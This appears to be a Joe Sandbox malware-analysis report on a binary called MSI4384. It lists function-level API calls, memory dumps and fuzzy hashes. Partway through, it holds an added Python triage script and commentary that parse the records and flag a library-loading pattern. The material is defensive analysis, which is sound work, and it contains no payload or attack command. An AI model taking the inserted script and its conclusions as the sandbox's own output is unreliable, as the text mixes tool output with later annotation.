                                                                    • Opcode Fuzzy Hash: 62b98d2ce3533249c67303d12fcc67212e2fd03b269f00e16ba9abe05989b61d
                                                                    • Instruction Fuzzy Hash: 3351D872A00205AFEF289F62CC41EBB36A9EF44716F25042EFD05D6252E678ED04C66D
                                                                    APIs
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0042C86D
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0042C890
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0042C8B8
                                                                    • std::_Facet_Register.LIBCPMT ref: 0042C92D
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0042C961
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                    • String ID:
                                                                    • API String ID: 459529453-0
                                                                    • Opcode ID: b74b16f1e51192fea10616ee2cff43f69e5c4b0d8ceaefd41ff4c2a20533e0b5
                                                                    • Instruction ID: bb9f2dfc9f985d7cf39d9d11b06f0a766da78106a00a69a2c2ebbc30e9d79534
                                                                    • Opcode Fuzzy Hash: b74b16f1e51192fea10616ee2cff43f69e5c4b0d8ceaefd41ff4c2a20533e0b5
                                                                    • Instruction Fuzzy Hash: 4B41DEB190111A9FCB00EF54E980BAEFBB4FF48314F14816EE414A7391D778AA05CB99
                                                                    APIs
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0042F26D
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0042F290
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0042F2B8
                                                                    • std::_Facet_Register.LIBCPMT ref: 0042F32D
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0042F361
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                    • String ID:
                                                                    • API String ID: 459529453-0
                                                                    • Opcode ID: 8e71190626f1053007a528890efec77dba629134f705f1977dec74a1b5e487c5
                                                                    • Instruction ID: 0ea9a6ad183d7ce8a1c20678e99057d609c89c60d28fdc78ef6b936aef7b7222
                                                                    • Opcode Fuzzy Hash: 8e71190626f1053007a528890efec77dba629134f705f1977dec74a1b5e487c5
                                                                    • Instruction Fuzzy Hash: 53410371900219DFCB10DF54E8407AEBBB4FB44724FA5857ED81067391D738AE04CB99
                                                                    APIs
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0042EAAD
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0042EAD0
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0042EAF8
                                                                    • std::_Facet_Register.LIBCPMT ref: 0042EB6D
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0042EBA1
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                    • String ID:
                                                                    • API String ID: 459529453-0
                                                                    • Opcode ID: 6886a1cd06f3d211745018517b886e2ba1788a0489c4ec65c2f2d5bfa69a4783
                                                                    • Instruction ID: c337a0aeeb011169451686a79e22dd06b15a19abccf12beac5f34ec395fd7c51
                                                                    • Opcode Fuzzy Hash: 6886a1cd06f3d211745018517b886e2ba1788a0489c4ec65c2f2d5bfa69a4783
                                                                    • Instruction Fuzzy Hash: A3410D7090022ADFCB00DF49E840BAEFBB4FB44324F14856ED81167391D738AE00CB99
                                                                    APIs
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0042EBED
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0042EC10
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0042EC38
                                                                    • std::_Facet_Register.LIBCPMT ref: 0042ECAD
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0042ECE1
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                    • String ID:
                                                                    • API String ID: 459529453-0
                                                                    • Opcode ID: 7cbcc05dae6d2c11b8ba6ec470ad10dfe8cf2e506513f2973be751700a2cdb12
                                                                    • Instruction ID: ed7f02a4aaa4c1987b0433834c6edc133454cd93301af3f63c991608b455e69a
                                                                    • Opcode Fuzzy Hash: 7cbcc05dae6d2c11b8ba6ec470ad10dfe8cf2e506513f2973be751700a2cdb12
                                                                    • Instruction Fuzzy Hash: 9541F271901216DFDB05DF9AE9807AEFBB4FB44324F15816ED810A7390D738AE05CB99
                                                                    APIs
                                                                    • GetLastError.KERNEL32(00000010,00000010,?,00427ACB,?,?,?), ref: 00427E47
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast
                                                                    • String ID: Call to ShellExecuteEx() returned:$Last error=$false$true
                                                                    • API String ID: 1452528299-1782174991
                                                                    • Opcode ID: 37c6f24ffdbc812963a0c0e36333b34e0fa1ca7b53da3f05e2a932e59d2a2aa6
                                                                    • Instruction ID: 94f8d86dfae82c76bd4dfc9ba906565b0cd0d606efd632ffd7c4c47388e742c4
                                                                    • Opcode Fuzzy Hash: 37c6f24ffdbc812963a0c0e36333b34e0fa1ca7b53da3f05e2a932e59d2a2aa6
                                                                    • Instruction Fuzzy Hash: 4E213D4AB1027286CB705F3D940037AA2F1AF94B55BA6586FD8C8D7390F76D8C8183A9
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,0045D268,?,0044E0E9,?,?,?,?,?,?,0042163C,?,?,00000020), ref: 0045D0B1
                                                                    • SetLastError.KERNEL32(00000000,000000FF,?,0044E0E9,?,?,?,?,?,?,0042163C,?,?,00000020), ref: 0045D0CB
                                                                    • SetLastError.KERNEL32(00000000,00000000,00000000,?,000000FF,?,0044E0E9,?,?,?,?,?,?,0042163C,?,?), ref: 0045D101
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast
                                                                    • String ID: h!H
                                                                    • API String ID: 1452528299-1293787083
                                                                    • Opcode ID: e5894ddc24941b0a442619e366515a7766f394e4f0811a281b0e2d8ccb694de2
                                                                    • Instruction ID: c5022112db9a93643d59a569fbbd794fa9e27a3fb80d955f5654fcdeec66fd59
                                                                    • Opcode Fuzzy Hash: e5894ddc24941b0a442619e366515a7766f394e4f0811a281b0e2d8ccb694de2
                                                                    • Instruction Fuzzy Hash: EF01D2726082016FD2113771BC8AD2F2659EF417AEB60053FFD05541A7EA9A4C0E865E
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Maklocstr$Maklocchr
                                                                    • String ID:
                                                                    • API String ID: 2020259771-0
                                                                    • Opcode ID: 58a29249a863e2e4a4a37539f0f71cc3ba1c26bb190272e1ea29815b4eaf2c7b
                                                                    • Instruction ID: d14c70653d6d2573c11cb9f6a50c0b1e8798829d7dea785d69c987eea913e61c
                                                                    • Opcode Fuzzy Hash: 58a29249a863e2e4a4a37539f0f71cc3ba1c26bb190272e1ea29815b4eaf2c7b
                                                                    • Instruction Fuzzy Hash: 3E118FF19087447BE3209BA59841F13B7ECBF09754F04551AF189CBA41D368F85087E9
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00434178
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00434182
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • numpunct.LIBCPMT ref: 004341BC
                                                                    • std::_Facet_Register.LIBCPMT ref: 004341D3
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 004341F3
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
                                                                    • String ID:
                                                                    • API String ID: 743221004-0
                                                                    • Opcode ID: f115c5e5c67e25ea158f2a5f60a7f7520e7b0a700666ed870f8c97f9a4090e3f
                                                                    • Instruction ID: 8d437f5735990594e910453c295a7a63880faf14f02737c674347807af77e5a8
                                                                    • Opcode Fuzzy Hash: f115c5e5c67e25ea158f2a5f60a7f7520e7b0a700666ed870f8c97f9a4090e3f
                                                                    • Instruction Fuzzy Hash: 0C1102319001199BCF04FFA1D8556BE77A1AF88718F24401FF510A7391DF78AE018B99
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 004453B2
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 004453BC
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • moneypunct.LIBCPMT ref: 004453F6
                                                                    • std::_Facet_Register.LIBCPMT ref: 0044540D
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0044542D
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                    • String ID:
                                                                    • API String ID: 419941038-0
                                                                    • Opcode ID: 6ecf88e30246ad3b2f5a740c23a8a8646b89ab92e720719086dd4a9a7ac75019
                                                                    • Instruction ID: f8f9f08d27f8da5281818c67cb2bfa6a5ca1cdf657af16defbc74a07cc339f53
                                                                    • Opcode Fuzzy Hash: 6ecf88e30246ad3b2f5a740c23a8a8646b89ab92e720719086dd4a9a7ac75019
                                                                    • Instruction Fuzzy Hash: A0010471A005259BDB04FFA5D851AAE7761BF48719F20441EF811AB3D2DFB89E018BC9
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00445447
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00445451
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • moneypunct.LIBCPMT ref: 0044548B
                                                                    • std::_Facet_Register.LIBCPMT ref: 004454A2
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 004454C2
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                    • String ID:
                                                                    • API String ID: 419941038-0
                                                                    • Opcode ID: e51bd608877d63bd994e5aac4fdfaf4e4b1a5eea0be7aa79bd7318d8a918f1aa
                                                                    • Instruction ID: bfe7a30b6232d5ce80fdb9fa004ab253ef6d4ce5069e0691bb77552dede4c6ff
                                                                    • Opcode Fuzzy Hash: e51bd608877d63bd994e5aac4fdfaf4e4b1a5eea0be7aa79bd7318d8a918f1aa
                                                                    • Instruction Fuzzy Hash: 7D014471A00525EBDF04FFA0D801AAEB770AF84719F10041EE5016B382DF7C9E008BAA
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00433FB9
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00433FC3
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • codecvt.LIBCPMT ref: 00433FFD
                                                                    • std::_Facet_Register.LIBCPMT ref: 00434014
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00434034
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                    • String ID:
                                                                    • API String ID: 712880209-0
                                                                    • Opcode ID: 223fa9f0375bb194223df4971539f497deacabf6370652c915f7fe10dfff8c7b
                                                                    • Instruction ID: 40639d1c595dd18077158d2d6f732960e8aebcf3eeba16703c22f12c9066242d
                                                                    • Opcode Fuzzy Hash: 223fa9f0375bb194223df4971539f497deacabf6370652c915f7fe10dfff8c7b
                                                                    • Instruction Fuzzy Hash: B3012B31A001159BCB04FFA5D8556AE7770AF88718F21441FF910AB3D1DF7C9E008B89
                                                                    APIs
                                                                    • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 004261B5
                                                                    • GetLastError.KERNEL32(?,?,?,000000FF,0046B8CD,000000FF), ref: 0042626B
                                                                      • Part of subcall function 00421FD0: FindResourceW.KERNEL32(00000000,?,00000006,?,00000000,0046B0ED,000000FF,?,80070057,?,00000000,?,00000010,?,00421B09,?), ref: 0042205C
                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,000000FF,0046B8CD,000000FF), ref: 0042620F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: DirectoryErrorFindLastLibraryLoadResourceSystem
                                                                    • String ID: ntdll.dll
                                                                    • API String ID: 4113295189-2227199552
                                                                    • Opcode ID: f9492f073c387711961b306724e85f20578249a64bfa6251962d42687feef194
                                                                    • Instruction ID: 6ae90586fa53f911405ab6227d444248164c09aae110fe23e1aea9fe34d25599
                                                                    • Opcode Fuzzy Hash: f9492f073c387711961b306724e85f20578249a64bfa6251962d42687feef194
                                                                    • Instruction Fuzzy Hash: 6F41B371A00219DFDB10DF69DD44BAEB7B4FF04310F54416AE815D72C1E7B89904CB65
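The record layout used throughout this section (an APIs list, then the Similarity fields String ID, API String ID and the two fuzzy hashes) lends itself to scripted triage. The following is an added example, not Joe Sandbox's code and not part of the report: it parses records in that layout, groups them by API String ID (the report's own similarity key), and flags functions that call both GetSystemDirectoryW and LoadLibraryExW, as the record above with String ID ntdll.dll does. The two embedded records are abridged from this page (argument lists and the Associated dump lines shortened); the regular expressions and helper names are assumptions made for the example.

```python
"""Triage helper for Joe Sandbox per-function records extracted as text.

Added example, not Joe Sandbox's own code. Parses the record layout of this
report page, groups records by API String ID, and flags functions that
resolve the system directory and then call LoadLibraryExW.
"""
import re
from collections import defaultdict

# Constructed sample: two records abridged from this report page (the
# GetSystemDirectoryW/LoadLibraryExW function with string 'ntdll.dll', and
# the CRT 'api-ms-' loader). Argument lists and 'Associated' lines were
# shortened; hashes and addresses are the page's own values.
SAMPLE = """\
APIs
• GetSystemDirectoryW.KERNEL32(?,00000105), ref: 004261B5
• GetLastError.KERNEL32(?,?,?,000000FF,0046B8CD,000000FF), ref: 0042626B
  • Part of subcall function 00421FD0: FindResourceW.KERNEL32(00000000,?,00000006), ref: 0042205C
• LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,000000FF,0046B8CD,000000FF), ref: 0042620F
Strings
Memory Dump Source
• Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
Similarity
• API ID: DirectoryErrorFindLastLibraryLoadResourceSystem
• String ID: ntdll.dll
• API String ID: 4113295189-2227199552
• Opcode Fuzzy Hash: f9492f073c387711961b306724e85f20578249a64bfa6251962d42687feef194
• Instruction Fuzzy Hash: 6F41B371A00219DFDB10DF69DD44BAEB7B4FF04310F54416AE815D72C1E7B89904CB65
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0044DE33), ref: 0044DE8F
• GetLastError.KERNEL32(?,0044DE33,00000000), ref: 0044DE99
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0044DEC1
Strings
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID: api-ms-
• API String ID: 3177248105-2084034818
• Opcode Fuzzy Hash: 4656811069a8f74d9988c22eab74c56a1821305e0b515d6f30ac644958ef5256
• Instruction Fuzzy Hash: 52E04F30684604B7EF211F61EC06F5A3F55AB11F52F304032FA4CE81E2E7EAE958958D
"""

# One API line: optional "Part of subcall function XXXX:" prefix, then
# Name.Module(optional args), ref: address. Covers Win32 imports such as
# "GetLastError.KERNEL32(...)" and CRT symbols such as "std::_Lockit::~_Lockit.LIBCPMT".
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[\w:~]+)\.(?P<lib>\w+)(?:\(.*\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
FIELD_RE = re.compile(r"^•\s*(?P<key>[\w ]+?):\s*(?P<val>.*)$")
SECTIONS = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}


def parse_records(text):
    """Split the text into records (one per 'APIs' header) and return dicts
    with the function's own calls, subcall-only calls and Similarity fields."""
    records, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = {"apis": [], "subcall_apis": [], "fields": {}}
            records.append(cur)
            section = "APIs"
        elif cur is None:
            continue
        elif line in SECTIONS:
            section = line
        elif section == "APIs":
            m = API_RE.match(line)
            if m:
                call = (m["name"], m["lib"], int(m["ref"], 16))
                (cur["subcall_apis"] if m["sub"] else cur["apis"]).append(call)
        elif section == "Similarity":
            m = FIELD_RE.match(line)
            if m:
                cur["fields"][m["key"]] = m["val"]
    return records


def direct_calls(record):
    """Set of API names the function calls itself (subcall lines excluded)."""
    return {name for name, _lib, _ref in record["apis"]}


def group_by_api_string_id(records):
    """Group on the report's similarity key; records sharing an API String ID
    have the same API set and string set, which collapses the many
    near-identical CRT/STL helpers into a few buckets."""
    groups = defaultdict(list)
    for r in records:
        groups[r["fields"].get("API String ID", "")].append(r)
    return dict(groups)


def find_system_dir_loaders(records):
    """Functions that both query the system directory and load a library,
    the pattern of the 'ntdll.dll' record. The CRT 'api-ms-' probe also calls
    LoadLibraryExW (flag 0x800, LOAD_LIBRARY_SEARCH_SYSTEM32, then 0) but
    never GetSystemDirectoryW, so it is not returned."""
    wanted = {"GetSystemDirectoryW", "LoadLibraryExW"}
    return [r for r in records if wanted <= direct_calls(r)]


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for r in find_system_dir_loaders(recs):
        f = r["fields"]
        print(f["String ID"], f["API String ID"], sorted(direct_calls(r)))
```

Run directly, it prints only the ntdll.dll record. The api-ms- record is deliberately left unflagged: a LoadLibraryExW call with flag 00000800 (LOAD_LIBRARY_SEARCH_SYSTEM32) followed by a fallback call with 0, next to the InitializeCriticalSectionEx string in its arguments, is consistent with the MSVC CRT's own downlevel API-set probe and is expected in any recent MSVC-built binary, so it carries no weight by itself. Likewise the std::_Lockit / _Facet_Register / moneypunct / codecvt records are MSVC STL locale initialisation and group together under a handful of API String IDs.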
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Mpunct$H_prolog3
                                                                    • String ID: $+xv
                                                                    • API String ID: 4281374311-1686923651
                                                                    • Opcode ID: e2346cf69dfeb67103e05149a3e57884c4065fb816b32d1b4ba01566d9fc9487
                                                                    • Instruction ID: 8fe0d7d6e9e7a17b9257f1e72da0ba4f6b5f96ce683b95b7f5deab543835c69e
                                                                    • Opcode Fuzzy Hash: e2346cf69dfeb67103e05149a3e57884c4065fb816b32d1b4ba01566d9fc9487
                                                                    • Instruction Fuzzy Hash: 9A21D0B1800B56AEEB25DF75884076BBBF8AB0D304F04091FE499C7A42D778E605CF95
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0043DF64
                                                                      • Part of subcall function 00437D3A: _Maklocstr.LIBCPMT ref: 00437D5A
                                                                      • Part of subcall function 00437D3A: _Maklocstr.LIBCPMT ref: 00437D77
                                                                      • Part of subcall function 00437D3A: _Maklocstr.LIBCPMT ref: 00437D94
                                                                      • Part of subcall function 00437D3A: _Maklocchr.LIBCPMT ref: 00437DA6
                                                                      • Part of subcall function 00437D3A: _Maklocchr.LIBCPMT ref: 00437DB9
                                                                    • _Mpunct.LIBCPMT ref: 0043DFFC
                                                                    • _Mpunct.LIBCPMT ref: 0043E016
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Maklocstr$MaklocchrMpunct$H_prolog3
                                                                    • String ID: $+xv
                                                                    • API String ID: 2939335142-1686923651
                                                                    • Opcode ID: 2033cb136ef1b9d1fce2125b6833441d7ab31aff227ae18f656f45ed3adfa4ed
